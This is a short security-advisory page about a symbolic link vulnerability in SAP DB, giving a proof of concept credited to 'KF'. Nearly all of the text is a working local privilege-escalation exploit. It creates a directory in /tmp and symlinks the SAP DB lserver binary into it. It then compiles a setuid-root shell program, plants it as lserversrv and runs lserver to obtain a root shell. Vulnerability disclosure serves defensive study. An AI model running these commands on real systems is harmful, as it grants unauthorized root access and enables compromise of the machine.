|
|
SAP DB Symbolic Link Vulnerability
The following proof of concept was provided by KF cd /tmp mkdir "snosoft+sapdb=root" cd "snosoft+sapdb=root" ln -s /usr/sapdb/depend/pgm/lserver lserver echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > root.c cc -o root root.c cp root lserversrv ./lserver |
|
Privacy Statement |